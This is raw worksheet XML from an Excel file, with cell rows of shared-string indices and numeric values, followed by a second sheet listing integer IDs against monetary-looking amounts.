      <c r="BA1269" t="s">
        <v>17756</v>
      </c>
      <c r="BB1269">
        <v>0</v>
      </c>
      <c r="BC1269" t="s">
        <v>14186</v>
      </c>
      <c r="BD1269" t="s">
        <v>14187</v>
      </c>
    </row>
    <row r="1270" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1270">
        <v>5929</v>
      </c>
      <c r="B1270" t="s">
        <v>9410</v>
      </c>
      <c r="C1270" t="s">
        <v>2308</v>
      </c>
      <c r="D1270" t="s">
        <v>6698</v>
      </c>
      <c r="E1270" t="s">
        <v>142</v>
      </c>
      <c r="F1270" t="s">
        <v>6699</v>
      </c>
      <c r="G1270" s="1">
        <v>44382</v>
      </c>
      <c r="H1270">
        <v>12542</v>
      </c>
      <c r="I1270">
        <v>12542</v>
      </c>
      <c r="J1270">
        <v>1</v>
      </c>
      <c r="K1270">
        <v>0</v>
      </c>
      <c r="L1270">
        <v>2</v>
      </c>
      <c r="M1270">
        <v>0</v>
      </c>
      <c r="N1270">
        <v>0</v>
      </c>
      <c r="O1270">
        <v>0</v>
      </c>
      <c r="P1270">
        <v>0</v>
      </c>
      <c r="Q1270">
        <v>5</v>
      </c>
      <c r="R1270">
        <v>4</v>
      </c>
      <c r="S1270">
        <v>0</v>
      </c>
      <c r="T1270">
        <v>1</v>
      </c>
      <c r="U1270">
        <v>80000</v>
      </c>
      <c r="V1270">
        <v>0</v>
      </c>
      <c r="W1270">
        <v>15000</v>
      </c>
      <c r="X1270">
        <v>0</v>
      </c>
      <c r="Y1270">
        <v>0</v>
      </c>
      <c r="Z1270">
        <v>0</v>
      </c>
      <c r="AA1270">
        <v>0</v>
      </c>
      <c r="AB1270">
        <v>1500</v>
      </c>
      <c r="AC1270">
        <v>2000</v>
      </c>
      <c r="AD1270">
        <v>0</v>
      </c>
      <c r="AE1270">
        <v>5000</v>
      </c>
      <c r="AF1270" t="s">
        <v>9411</v>
      </c>
      <c r="AG1270">
        <v>98415</v>
      </c>
      <c r="AH1270">
        <v>33</v>
      </c>
      <c r="AJ1270">
        <v>485</v>
      </c>
      <c r="AK1270" t="s">
        <v>2313</v>
      </c>
      <c r="AL1270" t="s">
        <v>2314</v>
      </c>
      <c r="AM1270" t="s">
        <v>9412</v>
      </c>
      <c r="AN1270" t="s">
        <v>68</v>
      </c>
      <c r="AO1270">
        <v>2017</v>
      </c>
      <c r="AP1270" t="s">
        <v>9413</v>
      </c>
      <c r="AQ1270" t="s">
        <v>9414</v>
      </c>
      <c r="AR1270" t="s">
        <v>9415</v>
      </c>
      <c r="AS1270" t="s">
        <v>71</v>
      </c>
      <c r="AT1270" t="s">
        <v>72</v>
      </c>
      <c r="AU1270">
        <v>0</v>
      </c>
      <c r="AV1270">
        <v>0</v>
      </c>
      <c r="AW1270">
        <v>2</v>
      </c>
      <c r="AX1270">
        <v>3</v>
      </c>
      <c r="AY1270">
        <v>6</v>
      </c>
      <c r="AZ1270">
        <v>3</v>
      </c>
      <c r="BA1270" t="s">
        <v>17757</v>
      </c>
      <c r="BB1270">
        <v>0</v>
      </c>
      <c r="BC1270" t="s">
        <v>9693</v>
      </c>
      <c r="BD127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393ED-9C8C-A341-AD15-DC94C2B8C6EF}">
  <dimension ref="A3:B1273"/>
  <sheetViews>
    <sheetView zoomScale="90" zoomScaleNormal="90" workbookViewId="0">
      <selection activeCell="B28" sqref="B28"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="9.5" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="14.33203125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3" s="6" t="s">
        <v>0</v>
      </c>
      <c r="B3" t="s">
        <v>16582</v>
      </c>
    </row>
    <row r="4" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4">
        <v>7</v>
      </c>
      <c r="B4" s="8">
        <v>800000</v>
      </c>
    </row>
    <row r="5" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5">
        <v>10</v>
      </c>
      <c r="B5" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="6" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A6">
        <v>14</v>
      </c>
      <c r="B6" s="8"/>
    </row>
    <row r="7" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A7">
        <v>16</v>
      </c>
      <c r="B7" s="8">
        <v>47000</v>
      </c>
    </row>
    <row r="8" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A8">
        <v>18</v>
      </c>
      <c r="B8" s="8">
        <v>10000</v>
      </c>
    </row>
    <row r="9" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A9">
        <v>19</v>
      </c>
      <c r="B9" s="8">
        <v>30000</v>
      </c>
    </row>
    <row r="10" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A10">
        <v>20</v>
      </c>
      <c r="B10" s="8">
        <v>49000</v>
      </c>
    </row>
    <row r="11" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A11">
        <v>21</v>
      </c>
      <c r="B11" s="8">
        <v>375000</v>
      </c>
    </row>
    <row r="12" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A12">
        <v>27</v>
      </c>
      <c r="B12" s="8">
        <v>990000</v>
      </c>
    </row>
    <row r="13" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A13">
        <v>28</v>
      </c>
      <c r="B13" s="8">
        <v>81000</v>
      </c>
    </row>
    <row r="14" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A14">
        <v>29</v>
      </c>
      <c r="B14" s="8">
        <v>134000</v>
      </c>
    </row>
    <row r="15" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A15">
        <v>34</v>
      </c>
      <c r="B15" s="8">
        <v>150000</v>
      </c>
    </row>
    <row r="16" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A16">
        <v>35</v>
      </c>
      <c r="B16" s="8">
        <v>28684430</v>
      </c>
    </row>
    <row r="17" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A17">
        <v>42</v>
      </c>
      <c r="B17" s="8">
        <v>356000</v>
      </c>
    </row>
    <row r="18" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A18">
        <v>46</v>
      </c>
      <c r="B18" s="8">
        <v>1224500</v>
      </c>
    </row>
    <row r="19" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A19">
        <v>48</v>
      </c>
      <c r="B19" s="8">
        <v>13151000</v>
      </c>
    </row>
    <row r="20" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A20">
        <v>49</v>
      </c>
      <c r="B20" s="8">
        <v>20000</v>
      </c>
    </row>
    <row r="21" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A21">
        <v>50</v>
      </c>
      <c r="B21" s="8">
        <v>400000</v>
      </c>
    </row>
    <row r="22" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A22">
        <v>51</v>
      </c>
      <c r="B22" s="8">
        <v>40000</v>
      </c>
    </row>
    <row r="23" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A23">
        <v>56</v>
      </c>
      <c r="B23" s="8">
        <v>300000</v>
      </c>
    </row>
    <row r="24" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A24">
        <v>57</v>
      </c>
      <c r="B24" s="8">
        <v>170678.78999999998</v>
      </c>
    </row>
    <row r="25" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A25">
        <v>67</v>
      </c>
      <c r="B25" s="8">
        <v>100000</v>
      </c>
    </row>
    <row r="26" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A26">
        <v>80</v>
      </c>
      <c r="B26" s="8">
        <v>2812600</v>
      </c>
    </row>
    <row r="27" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A27">
        <v>82</v>
      </c>
      <c r="B27" s="8">
        <v>308847</v>
      </c>
    </row>
    <row r="28" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A28">
        <v>88</v>
      </c>
      <c r="B28" s="8">
        <v>1509594</v>
      </c>
    </row>
    <row r="29" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A29">
        <v>91</v>
      </c>
      <c r="B29" s="8">
        <v>180000</v>
      </c>
    </row>
    <row r="30" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A30">
        <v>92</v>
      </c>
      <c r="B30" s="8">
        <v>164000</v>
      </c>
    </row>
    <row r="31" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A31">
        <v>102</v>
      </c>
      <c r="B31" s="8">
        <v>65000</v>
      </c>
    </row>
    <row r="32" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A32">
        <v>108</v>
      </c>
      <c r="B32" s="8">
        <v>120529.3</v>
      </c>
    </row>
    <row r="33" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A33">
        <v>111</v>
      </c>
      <c r="B33" s="8">
        <v>3225000</v>
      </c>
    </row>
    <row r="34" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A34">
        <v>112</v>
      </c>
      <c r="B34" s="8">
        <v>2575000</v>
      </c>
    </row>
    <row r="35" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A35">
        <v>114</v>
      </c>
      <c r="B35" s="8">
        <v>220000</v>
      </c>
    </row>
    <row r="36" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A36">
        <v>117</v>
      </c>
      <c r="B36" s="8">
        <v>106000</v>
      </c>
    </row>
    <row r="37" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A37">
        <v>124</v>
      </c>
      <c r="B37" s="8">
        <v>260000</v>
      </c>
    </row>
    <row r="38" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A38">
        <v>131</v>
      </c>
      <c r="B38" s="8">
        <v>2002600000</v>
      </c>
    </row>
    <row r="39" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A39">
        <v>133</v>
      </c>
      <c r="B39" s="8">
        <v>1507680</v>
      </c>
    </row>
    <row r="40" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A40">
        <v>138</v>
      </c>
      <c r="B40" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A41">
        <v>142</v>
      </c>
      <c r="B41" s="8">
        <v>800000</v>
      </c>
    </row>
    <row r="42" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A42">
        <v>149</v>
      </c>
      <c r="B42" s="8">
        <v>500</v>
      </c>
    </row>
    <row r="43" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A43">
        <v>159</v>
      </c>
      <c r="B43" s="8">
        <v>330841</v>
      </c>
    </row>
    <row r="44" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A44">
        <v>160</v>
      </c>
      <c r="B44" s="8">
        <v>220000</v>
      </c>
    </row>
    <row r="45" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A45">
        <v>161</v>
      </c>
      <c r="B45" s="8">
        <v>500000</v>
      </c>
    </row>
    <row r="46" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A46">
        <v>162</v>
      </c>
      <c r="B46" s="8">
        <v>100000</v>
      </c>
    </row>
    <row r="47" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A47">
        <v>163</v>
      </c>
      <c r="B47" s="8">
        <v>198200</v>
      </c>
    </row>
    <row r="48" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A48">
        <v>170</v>
      </c>
      <c r="B48" s="8">
        <v>750000</v>
      </c>
    </row>
    <row r="49" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A49">
        <v>174</v>
      </c>
      <c r="B49" s="8">
        <v>62333</v>
      </c>
    </row>
    <row r="50" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A50">
        <v>175</v>
      </c>
      <c r="B50" s="8">
        <v>434800</v>
      </c>
    </row>
    <row r="51" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A51">
        <v>181</v>
      </c>
      <c r="B51" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="52" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A52">
        <v>186</v>
      </c>
      <c r="B52" s="8">
        <v>1285309</v>
      </c>
    </row>
    <row r="53" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A53">
        <v>195</v>
      </c>
      <c r="B53" s="8">
        <v>1350000</v>
      </c>
    </row>
    <row r="54" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A54">
        <v>197</v>
      </c>
      <c r="B54" s="8">
        <v>600000</v>
      </c>
    </row>
    <row r="55" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A55">
        <v>204</v>
      </c>
      <c r="B55" s="8">
        <v>400</v>
      </c>
    </row>
    <row r="56" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A56">
        <v>206</v>
      </c>
      <c r="B56" s="8">
        <v>60000</v>
      </c>
    </row>
    <row r="57" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A57">
        <v>210</v>
      </c>
      <c r="B57" s="8">
        <v>6000</v>
      </c>
    </row>
    <row r="58" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A58">
        <v>215</v>
      </c>
      <c r="B58" s="8">
        <v>30000</v>
      </c>
    </row>
    <row r="59" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A59">
        <v>217</v>
      </c>
      <c r="B59" s="8">
        <v>1210000</v>
      </c>
    </row>
    <row r="60" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A60">
        <v>226</v>
      </c>
      <c r="B60" s="8">
        <v>2887850</v>
      </c>
    </row>
    <row r="61" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A61">
        <v>227</v>
      </c>
      <c r="B61" s="8">
        <v>7176000</v>
      </c>
    </row>
    <row r="62" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A62">
        <v>228</v>
      </c>
      <c r="B62" s="8">
        <v>505000</v>
      </c>
    </row>
    <row r="63" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A63">
        <v>229</v>
      </c>
      <c r="B63" s="8">
        <v>564000</v>
      </c>
    </row>
    <row r="64" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A64">
        <v>233</v>
      </c>
      <c r="B64" s="8">
        <v>9600000</v>
      </c>
    </row>
    <row r="65" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A65">
        <v>235</v>
      </c>
      <c r="B65" s="8">
        <v>11009000</v>
      </c>
    </row>
    <row r="66" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A66">
        <v>236</v>
      </c>
      <c r="B66" s="8">
        <v>122000</v>
      </c>
    </row>
    <row r="67" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A67">
        <v>237</v>
      </c>
      <c r="B67" s="8">
        <v>1450050</v>
      </c>
    </row>
    <row r="68" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A68">
        <v>241</v>
      </c>
      <c r="B68" s="8">
        <v>3201426.1500000004</v>
      </c>
    </row>
    <row r="69" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A69">
        <v>242</v>
      </c>
      <c r="B69" s="8">
        <v>5399000</v>
      </c>
    </row>
    <row r="70" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A70">
        <v>244</v>
      </c>
      <c r="B70" s="8">
        <v>1750000</v>
      </c>
    </row>
    <row r="71" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A71">
        <v>246</v>
      </c>
      <c r="B71" s="8">
        <v>8601000</v>
      </c>
    </row>
    <row r="72" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A72">
        <v>247</v>
      </c>
      <c r="B72" s="8">
        <v>1777584</v>
      </c>
    </row>
    <row r="73" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A73">
        <v>248</v>
      </c>
      <c r="B73" s="8">
        <v>1270000</v>
      </c>
    </row>
    <row r="74" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A74">
        <v>253</v>
      </c>
      <c r="B74" s="8">
        <v>3000000</v>
      </c>
    </row>
    <row r="75" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A75">
        <v>256</v>
      </c>
      <c r="B75" s="8">
        <v>44000</v>
      </c>
    </row>
    <row r="76" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A76">
        <v>259</v>
      </c>
      <c r="B76" s="8">
        <v>138795</v>
      </c>
    </row>
    <row r="77" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A77">
        <v>272</v>
      </c>
      <c r="B77" s="8">
        <v>920000</v>
      </c>
    </row>
    <row r="78" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A78">
        <v>276</v>
      </c>
      <c r="B78" s="8">
        <v>270000</v>
      </c>
    </row>
    <row r="79" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A79">
        <v>280</v>
      </c>
      <c r="B79" s="8">
        <v>577500</v>
      </c>
    </row>
    <row r="80" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A80">
        <v>285</v>
      </c>
      <c r="B80" s="8">
        <v>325682.33</v>
      </c>
    </row>
    <row r="81" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A81">
        <v>286</v>
      </c>
      <c r="B81" s="8">
        <v>8250000</v>
      </c>
    </row>
    <row r="82" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A82">
        <v>290</v>
      </c>
      <c r="B82" s="8">
        <v>11700</v>
      </c>
    </row>
    <row r="83" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A83">
        <v>292</v>
      </c>
      <c r="B83" s="8">
        <v>1500000</v>
      </c>
    </row>
    <row r="84" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A84">
        <v>295</v>
      </c>
      <c r="B84" s="8">
        <v>1200000</v>
      </c>
    </row>
    <row r="85" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A85">
        <v>296</v>
      </c>
      <c r="B85" s="8">
        <v>12000000</v>
      </c>
    </row>
    <row r="86" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A86">
        <v>297</v>
      </c>
      <c r="B86" s="8">
        <v>225500</v>
      </c>
    </row>
    <row r="87" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A87">
        <v>300</v>
      </c>
      <c r="B87" s="8">
        <v>600000</v>
      </c>
    </row>
    <row r="88" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A88">
        <v>302</v>
      </c>
      <c r="B88" s="8">
        <v>900000</v>
      </c>
    </row>
    <row r="89" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A89">
        <v>305</v>
      </c>
      <c r="B89" s="8">
        <v>8000</v>
      </c>
    </row>
    <row r="90" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A90">
        <v>306</v>
      </c>
      <c r="B90" s="8">
        <v>2032483</v>
      </c>
    </row>
    <row r="91" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A91">
        <v>318</v>
      </c>
      <c r="B91" s="8">
        <v>1239810</v>
      </c>
    </row>
    <row r="92" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A92">
        <v>321</v>
      </c>
      <c r="B92" s="8">
        <v>561295</v>
      </c>
    </row>
    <row r="93" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A93">
        <v>324</v>
      </c>
      <c r="B93" s="8">
        <v>1200000</v>
      </c>
    </row>
    <row r="94" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A94">
        <v>325</v>
      </c>
      <c r="B94" s="8">
        <v>1050000</v>
      </c>
    </row>
    <row r="95" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A95">
        <v>331</v>
      </c>
      <c r="B95" s="8">
        <v>219872</v>
      </c>
    </row>
    <row r="96" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A96">
        <v>332</v>
      </c>
      <c r="B96" s="8">
        <v>3600000</v>
      </c>
    </row>
    <row r="97" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A97">
        <v>333</v>
      </c>
      <c r="B97" s="8">
        <v>1000</v>
      </c>
    </row>
    <row r="98" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A98">
        <v>337</v>
      </c>
      <c r="B98" s="8">
        <v>946945</v>
      </c>
    </row>
    <row r="99" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A99">
        <v>343</v>
      </c>
      <c r="B99" s="8">
        <v>480000</v>
      </c>
    </row>
    <row r="100" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A100">
        <v>346</v>
      </c>
      <c r="B100" s="8">
        <v>6716060</v>
      </c>
    </row>
    <row r="101" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A101">
        <v>350</v>
      </c>
      <c r="B101" s="8">
        <v>119111</v>
      </c>
    </row>
    <row r="102" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A102">
        <v>352</v>
      </c>
      <c r="B102" s="8">
        <v>2569000</v>
      </c>
    </row>
    <row r="103" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A103">
        <v>358</v>
      </c>
      <c r="B103" s="8">
        <v>300000</v>
      </c>
    </row>
    <row r="104" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A104">
        <v>359</v>
      </c>
      <c r="B104" s="8">
        <v>400000</v>
      </c>
    </row>
    <row r="105" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A105">
        <v>360</v>
      </c>
      <c r="B105" s="8">
        <v>2875000</v>
      </c>
    </row>
    <row r="106" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A106">
        <v>361</v>
      </c>
      <c r="B106" s="8">
        <v>200000</v>
      </c>
    </row>
    <row r="107" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A107">
        <v>364</v>
      </c>
      <c r="B107" s="8">
        <v>2920000</v>
      </c>
    </row>
    <row r="108" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A108">
        <v>365</v>
      </c>
      <c r="B108" s="8">
        <v>4948000</v>
      </c>
    </row>
    <row r="109" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A109">
        <v>366</v>
      </c>
      <c r="B109" s="8">
        <v>623918</v>
      </c>
    </row>
    <row r="110" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A110">
        <v>367</v>
      </c>
      <c r="B110" s="8">
        <v>90000</v>
      </c>
    </row>
    <row r="111" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A111">
        <v>368</v>
      </c>
      <c r="B111" s="8">
        <v>404734</v>
      </c>
    </row>
    <row r="112" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A112">
        <v>371</v>
      </c>
      <c r="B112" s="8">
        <v>18800</v>
      </c>
    </row>
    <row r="113" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A113">
        <v>373</v>
      </c>
      <c r="B113" s="8">
        <v>6180000</v>
      </c>
    </row>
    <row r="114" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A114">
        <v>374</v>
      </c>
      <c r="B114" s="8">
        <v>912250</v>
      </c>
    </row>
    <row r="115" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A115">
        <v>379</v>
      </c>
      <c r="B115" s="8">
        <v>725000</v>
      </c>
    </row>
    <row r="116" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A116">
        <v>383</v>
      </c>
      <c r="B116" s="8">
        <v>7300000</v>
      </c>
    </row>
    <row r="117" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A117">
        <v>384</v>
      </c>
      <c r="B117" s="8">
        <v>1200100</v>
      </c>
    </row>
    <row r="118" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A118">
        <v>385</v>
      </c>
      <c r="B118" s="8">
        <v>601000</v>
      </c>
    </row>
    <row r="119" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A119">
        <v>388</v>
      </c>
      <c r="B119" s="8">
        <v>108291</v>
      </c>
    </row>
    <row r="120" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A120">
        <v>389</v>
      </c>
      <c r="B120" s="8">
        <v>287000</v>
      </c>
    </row>
    <row r="121" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A121">
        <v>390</v>
      </c>
      <c r="B121" s="8">
        <v>18080000</v>
      </c>
    </row>
    <row r="122" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A122">
        <v>395</v>
      </c>
      <c r="B122" s="8">
        <v>132000</v>
      </c>
    </row>
    <row r="123" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A123">
        <v>403</v>
      </c>
      <c r="B123" s="8">
        <v>6400000</v>
      </c>
    </row>
    <row r="124" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A124">
        <v>408</v>
      </c>
      <c r="B124" s="8">
        <v>131000</v>
      </c>
    </row>
    <row r="125" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A125">
        <v>415</v>
      </c>
      <c r="B125" s="8">
        <v>850000</v>
      </c>
    </row>
    <row r="126" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A126">
        <v>420</v>
      </c>
      <c r="B126" s="8">
        <v>150000</v>
      </c>
    </row>
    <row r="127" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A127">
        <v>423</v>
      </c>
      <c r="B127" s="8">
        <v>468004.13</v>
      </c>
    </row>
    <row r="128" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A128">
        <v>427</v>
      </c>
      <c r="B128" s="8">
        <v>181000</v>
      </c>
    </row>
    <row r="129" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A129">
        <v>433</v>
      </c>
      <c r="B129" s="8">
        <v>60000</v>
      </c>
    </row>
    <row r="130" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A130">
        <v>438</v>
      </c>
      <c r="B130" s="8">
        <v>1800</v>
      </c>
    </row>
    <row r="131" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A131">
        <v>439</v>
      </c>
      <c r="B131" s="8">
        <v>483200</v>
      </c>
    </row>
    <row r="132" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A132">
        <v>442</v>
      </c>
      <c r="B132" s="8">
        <v>2021220</v>
      </c>
    </row>
    <row r="133" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A133">
        <v>444</v>
      </c>
      <c r="B133" s="8">
        <v>276082</v>
      </c>
    </row>
    <row r="134" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A134">
        <v>446</v>
      </c>
      <c r="B134" s="8">
        <v>1700000</v>
      </c>
    </row>
    <row r="135" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A135">
        <v>452</v>
      </c>
      <c r="B135" s="8">
        <v>1000000</v>
      </c>
    </row>
    <row r="136" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A136">
        <v>454</v>
      </c>
      <c r="B136" s="8">
        <v>1600</v>
      </c>
    </row>
    <row r="137" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A137">
        <v>455</v>
      </c>
      <c r="B137" s="8">
        <v>250000</v>
      </c>
    </row>
    <row r="138" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A138">
        <v>456</v>
      </c>
      <c r="B138" s="8">
        <v>1193000</v>
      </c>
    </row>
    <row r="139" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A139">
        <v>458</v>
      </c>
      <c r="B139" s="8">
        <v>113460</v>
      </c>
    </row>
    <row r="140" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A140">
        <v>459</v>
      </c>
      <c r="B140" s="8">
        <v>24960000</v>
      </c>
    </row>
    <row r="141" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A141">
        <v>460</v>
      </c>
      <c r="B141" s="8">
        <v>500000</v>
      </c>
    </row>
    <row r="142" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A142">
        <v>462</v>
      </c>
      <c r="B142" s="8">
        <v>100000</v>
      </c>
    </row>
    <row r="143" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A143">
        <v>463</v>
      </c>
      <c r="B143" s="8">
        <v>25000</v>
      </c>
    </row>
    <row r="144" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A144">
        <v>465</v>
      </c>
      <c r="B144" s="8">
        <v>19040</v>
      </c>
    </row>
    <row r="145" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A145">
        <v>466</v>
      </c>
      <c r="B145" s="8">
        <v>1000</v>
      </c>
    </row>
    <row r="146" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A146">
        <v>469</v>
      </c>
      <c r="B146" s="8">
        <v>841030</v>
      </c>
    </row>
    <row r="147" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A147">
        <v>473</v>
      </c>
      <c r="B147" s="8">
        <v>69000</v>
      </c>
    </row>
    <row r="148" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A148">
        <v>475</v>
      </c>
      <c r="B148" s="8">
        <v>1972812</v>
      </c>
    </row>
    <row r="149" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A149">
        <v>479</v>
      </c>
      <c r="B149" s="8">
        <v>600000</v>
      </c>
    </row>
    <row r="150" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A150">
        <v>480</v>
      </c>
      <c r="B150" s="8">
        <v>2711100</v>
      </c>
    </row>
    <row r="151" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A151">
        <v>482</v>
      </c>
      <c r="B151" s="8">
        <v>347100</v>
      </c>
    </row>
    <row r="152" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A152">
        <v>485</v>
      </c>
      <c r="B152" s="8">
        <v>11000</v>
      </c>
    </row>
    <row r="153" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A153">
        <v>486</v>
      </c>
      <c r="B153" s="8">
        <v>27810000</v>
      </c>
    </row>
    <row r="154" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A154">
        <v>489</v>
      </c>
      <c r="B154" s="8">
        <v>44600</v>
      </c>
    </row>
